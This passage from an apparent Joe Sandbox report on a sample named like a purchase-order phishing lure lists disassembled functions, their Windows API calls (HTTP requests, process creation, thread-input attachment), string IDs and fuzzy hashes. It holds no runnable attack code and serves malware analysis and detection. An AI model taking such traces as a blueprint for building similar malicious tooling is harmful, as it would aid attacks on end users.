                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ACC869
                      • GetDlgCtrlID.USER32 ref: 00ACC874
                      • GetParent.USER32 ref: 00ACC890
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC893
                      • GetDlgCtrlID.USER32(?), ref: 00ACC89C
                      • GetParent.USER32(?), ref: 00ACC8B8
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC8BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 313823418-1403004172
                      • Opcode ID: b6aecbcea1ef1a95af38dcec690b47f1f1e11ff07800dcdfb0d1bbae987ac645
                      • Instruction ID: 02794cf67fc9f8ab2fe32ac8574ae2678dce43bf9106b468fae473ba6e743480
                      • Opcode Fuzzy Hash: b6aecbcea1ef1a95af38dcec690b47f1f1e11ff07800dcdfb0d1bbae987ac645
                      • Instruction Fuzzy Hash: CE21B071A00208BBDF01EBA4CC85EFEBBB9EF45310F504015F515E72E1DB789915AB20
                      Function 00ACC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32 ref: 00ACC8D9
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00ACC8EE
                      • _wcscmp.LIBCMT ref: 00ACC900
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ACC97B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                      • Instruction ID: fa6ea9d3fb0c5dab7cd67da321fe6a7456cff3343933d157856e6ad381381498
                      • Opcode Fuzzy Hash: eca7bca95153244d755dfb9b155fadbb4be794f69a0542ea068e784fc9defa5e
                      • Instruction Fuzzy Hash: 9811E976648312B9FA052B30DC0AEE677ECDF07774B61005AF908E60E2FF716A026654
                      Function 00AEB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AEB777
                      • CoInitialize.OLE32(00000000), ref: 00AEB7A4
                      • CoUninitialize.OLE32 ref: 00AEB7AE
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00AEB8AE
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AEB9DB
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00AEBA0F
                      • CoGetObject.OLE32(?,00000000,00B1D91C,?), ref: 00AEBA32
                      • SetErrorMode.KERNEL32(00000000), ref: 00AEBA45
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AEBAC5
                      • VariantClear.OLEAUT32(00B1D91C), ref: 00AEBAD5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID:
                      • API String ID: 2395222682-0
                      • Opcode ID: 1b782450dd959815367f9b13d78d3429c2298577f5bb7989e11b57dda95519c2
                      • Instruction ID: 973e4e4d758a16adfecc62a4b5e63dd55a806b1f4e013f45cf4461bb04607866
                      • Opcode Fuzzy Hash: 1b782450dd959815367f9b13d78d3429c2298577f5bb7989e11b57dda95519c2
                      • Instruction Fuzzy Hash: D4C14571618345AFC700DF69C888A6BB7E9FF88358F00495DF58A9B251DB30ED01CB62
                      Function 00ADB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00ADB137
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ArraySafeVartype
                      • String ID:
                      • API String ID: 1725837607-0
                      • Opcode ID: b20d60da1541824cb79a0138cf647d17c4614900f650c14f205f8958efefa3a0
                      • Instruction ID: a826a09614dfb13b65a468ef1ddd06f5d8c9b23671317aa40dd66b9ade1d659a
                      • Opcode Fuzzy Hash: b20d60da1541824cb79a0138cf647d17c4614900f650c14f205f8958efefa3a0
                      • Instruction Fuzzy Hash: 18C17E75A1121ADFDB04CF98D481BEEB7B4FF08315F21406AE616EB351D734AA81DBA0
                      Function 00AD7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                      Download Yara Rule
                      APIs
                      • __swprintf.LIBCMT ref: 00AD7226
                      • __swprintf.LIBCMT ref: 00AD7233
                        • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AD725D
                      • LoadResource.KERNEL32(?,00000000), ref: 00AD7269
                      • LockResource.KERNEL32(00000000), ref: 00AD7276
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00AD7296
                      • LoadResource.KERNEL32(?,00000000), ref: 00AD72A8
                      • SizeofResource.KERNEL32(?,00000000), ref: 00AD72B7
                      • LockResource.KERNEL32(?), ref: 00AD72C3
                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AD7322
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                      • String ID:
                      • API String ID: 1433390588-0
                      • Opcode ID: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                      • Instruction ID: f615c46d8f7db0c112ea039bf40e9c9bf05e0fddd1a598e43a21df6294e391cc
                      • Opcode Fuzzy Hash: d4c58d2161cb31d2105fc82053ec13e2b6acb1288e734fa717d6cffafb703012
                      • Instruction Fuzzy Hash: 2B31AD7190425AABCB059F61DC89AFF7BA9FF08301B048426FD12D7250EB34DA50DAA0
                      Function 00AD4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00AD4A7D
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4A91
                      • GetWindowThreadProcessId.USER32(00000000), ref: 00AD4A98
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AA7
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD4AB9
                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AD2
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AE4
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B29
                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B3E
                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B49
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                      • Instruction ID: 4cbea96c8d089531668907c66aaad1cf9c8b22fee60108447e9d5537852866cb
                      • Opcode Fuzzy Hash: b713b0c1c97c9be767c1db7a6d2cb3788cfdb68ce6b351f58260cbf31bcd4bf2
                      • Instruction Fuzzy Hash: 6731BF75600304AFEB119F14DC89BA977E9AB58796F54801BF90AD73A0DBB4DD408F60
                      Function 00B0EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?), ref: 00B0EC32
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B0EC49
                      • GetWindowDC.USER32(?), ref: 00B0EC55
                      • GetPixel.GDI32(00000000,?,?), ref: 00B0EC64
                      • ReleaseDC.USER32(?,00000000), ref: 00B0EC76
                      • GetSysColor.USER32(00000005), ref: 00B0EC94
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                      • String ID:
                      • API String ID: 272304278-0
                      • Opcode ID: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                      • Instruction ID: 89e0a89df93b5b87b842ad6471c8cf5e659b669d184c1c803fd764fa2875342f
                      • Opcode Fuzzy Hash: 7e0e86542b3988d08e5b157ed06520203918892f767227258790dfdb6d4dc888
                      • Instruction Fuzzy Hash: 3A212C31500205FFEB21AB74EC49BE97FB5EB05321F908665FA26A60E2DF314A51DF21
                      Function 00ACD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                      Download Yara Rule
                      APIs
                      • EnumChildWindows.USER32(?,00ACDD46), ref: 00ACDC86
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      • Opcode ID: e9e8fb2aa12668bb9f0888fb899c8f26c78b0dcd3cbbeafbd753677a6ab659c8
                      • Instruction ID: 030e96feb5e1517c6eebfd039d8234ec6faa02bfaacba343bc1bb156ff398c30
                      • Opcode Fuzzy Hash: e9e8fb2aa12668bb9f0888fb899c8f26c78b0dcd3cbbeafbd753677a6ab659c8
                      • Instruction Fuzzy Hash: 0D91B230A00506AACB0CDF64C581FEDFBB5FF09350F55812DE85AA7291DF30A95ADBA0
                      Function 00A945A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                      Download Yara Rule
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A945F0
                      • CoUninitialize.OLE32(?,00000000), ref: 00A94695
                      • UnregisterHotKey.USER32(?), ref: 00A947BD
                      • DestroyWindow.USER32(?), ref: 00B05936
                      • FreeLibrary.KERNEL32(?), ref: 00B0599D
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B059CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: d035f590f3ebe2e38300100b1c4795d82c588c05e87a8c0b623b4bce756cbd08
                      • Instruction ID: acc57edc059813d41d159087cb91cc7e2a77c301a00aa7c25138f096735fbaab
                      • Opcode Fuzzy Hash: d035f590f3ebe2e38300100b1c4795d82c588c05e87a8c0b623b4bce756cbd08
                      • Instruction Fuzzy Hash: 32910834700602DFCB19EF64C995E69F7E4FF19704F5142A9E40AA76A2DB30AD6ACF00
                      Function 00AAC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                      Download Yara Rule
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00AAC2D2
                        • Part of subcall function 00AAC697: GetClientRect.USER32(?,?), ref: 00AAC6C0
                        • Part of subcall function 00AAC697: GetWindowRect.USER32(?,?), ref: 00AAC701
                        • Part of subcall function 00AAC697: ScreenToClient.USER32(?,?), ref: 00AAC729
                      • GetDC.USER32 ref: 00B0E006
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B0E019
                      • SelectObject.GDI32(00000000,00000000), ref: 00B0E027
                      • SelectObject.GDI32(00000000,00000000), ref: 00B0E03C
                      • ReleaseDC.USER32(?,00000000), ref: 00B0E044
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B0E0CF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: e9d7487a25ad2cf29befa925ce24cae0415c8d25c80e4cc02ae2de324623fc0d
                      • Instruction ID: 7e881f400028d5740e9b08c898b6fa79c205e59cd70d9eed43e0fa5bc2d97a5f
                      • Opcode Fuzzy Hash: e9d7487a25ad2cf29befa925ce24cae0415c8d25c80e4cc02ae2de324623fc0d
                      • Instruction Fuzzy Hash: 0371DD31400209DFCF219FA4C881AEA7FB5FF49360F148AA9ED665B2E6D731C845DB60
                      Function 00AFEAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                        • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                        • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00AFEB0E
                      • ImageList_EndDrag.COMCTL32 ref: 00AFEB14
                      • ReleaseCapture.USER32 ref: 00AFEB1A
                      • SetWindowTextW.USER32(?,00000000), ref: 00AFEBC2
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AFEBD5
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00AFECAE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 1924731296-2107944366
                      • Opcode ID: e9faa4c7a45666bd41c0bd1c3e262163dad25b7b769039c043873264e57f1c73
                      • Instruction ID: 79b25d5cb36aa1c2f0fc1b4f76312639df006380a1c8fe4f3d670efcf49d05ae
                      • Opcode Fuzzy Hash: e9faa4c7a45666bd41c0bd1c3e262163dad25b7b769039c043873264e57f1c73
                      • Instruction Fuzzy Hash: DF51CD71204304AFD710EF64CD96FAA7BE5FB88744F40491CF6859B2E2CB709905CB62
                      Function 00AE4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE4C5E
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AE4C8A
                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AE4CCC
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AE4CE1
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4CEE
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AE4D1E
                      • InternetCloseHandle.WININET(00000000), ref: 00AE4D65
                        • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                      • String ID:
                      • API String ID: 1241431887-3916222277
                      • Opcode ID: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                      • Instruction ID: 1405ed1dff5180b80a2dc9e57148d9c91d25687f3872d9ad38ad07ce12667bbd
                      • Opcode Fuzzy Hash: f234461c2a251e1592ab763404ce3237f1e34c3209a48dd4a88785333f2d4c9f
                      • Instruction Fuzzy Hash: CA418DB1501658BFEB129F62CD89FFA77ACEF48314F10811AFA019B191DB74DD449BA0
                      Function 00AEBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2DBF0), ref: 00AEBBA1
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2DBF0), ref: 00AEBBD5
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AEBD33
                      • SysFreeString.OLEAUT32(?), ref: 00AEBD5D
                      • StringFromGUID2.OLE32(?,?,00000028,?,00B2DBF0), ref: 00AEBEAD
                      • ProgIDFromCLSID.OLE32(?,?,?,00B2DBF0), ref: 00AEBEF7
                      • CoTaskMemFree.OLE32(?,?,?,00B2DBF0), ref: 00AEBF14
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                      • String ID:
                      • API String ID: 793797124-0
                      • Opcode ID: a1a89c0880a6505850e9854b6530d1c3c7723f8eba49234385219eb64007697f
                      • Instruction ID: 72c1552410be91b6bd01b8be8b35e23d1a3f7cb8d99ea3f59e03a2008fb18169
                      • Opcode Fuzzy Hash: a1a89c0880a6505850e9854b6530d1c3c7723f8eba49234385219eb64007697f
                      • Instruction Fuzzy Hash: 96F10A75A10109EFCF04DFA5C988EAEB7B9FF89314F108499F905AB250DB31AE41CB60
                      Function 00AF23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AF23E6
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF2579
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF259D
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25DD
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25FF
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF2760
                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00AF2792
                      • CloseHandle.KERNEL32(?), ref: 00AF27C1
                      • CloseHandle.KERNEL32(?), ref: 00AF2838
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                      • String ID:
                      • API String ID: 4090791747-0
                      • Opcode ID: e181d3ce592c2b78cdd1219bb38d217a5c065a9529f56c36ee52509f4cee1b55
                      • Instruction ID: e5efd82413fb31dbaf5ceeea81788936146433d01724bd19df93d6a5114372c9
                      • Opcode Fuzzy Hash: e181d3ce592c2b78cdd1219bb38d217a5c065a9529f56c36ee52509f4cee1b55
                      • Instruction Fuzzy Hash: 89D1BD31604305DFCB14EF64C991B6ABBE5EF85320F14885DF9899B2A2DB30DC41CB52
